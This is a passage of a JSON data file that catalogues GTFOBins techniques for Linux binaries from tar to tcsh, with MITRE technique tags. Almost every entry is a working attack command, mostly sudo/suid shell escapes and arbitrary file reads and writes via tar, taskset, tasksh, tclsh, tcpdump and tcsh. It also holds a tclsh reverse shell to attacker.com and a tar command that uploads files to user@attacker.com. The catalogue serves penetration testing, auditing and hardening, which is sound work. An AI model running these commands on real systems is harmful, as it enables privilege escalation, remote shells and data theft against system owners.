installation","aliases":[]},{"id":"gtfo:tar:file-read:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-read:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-read:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-write:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-write:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-write:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:1:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:1:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:1:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:2:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:2:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:2:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:upload:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:upload:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:upload:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:task:shell:0:sudo","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/task/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:task:shell:0:suid","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/task/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:task:shell:0:unprivileged","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/task/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:taskset:shell:0:sudo","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/taskset/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:taskset:shell:0:unprivileged","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/taskset/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tasksh:shell:0:sudo","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tasksh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tasksh:shell:0:suid","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tasksh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tasksh:shell:0:unprivileged","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tasksh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tbl:file-read:0:sudo","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tbl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tbl:file-read:0:suid","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tbl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tbl:file-read:0:unprivileged","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tbl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:capabilities","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:reverse-shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:reverse-shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:reverse-shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file -Z root","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:1:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:1:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:file-write:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:file-write:0:suid","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:file-write:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:file-write:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:file-write:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -bc 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:file-write:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:shell:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 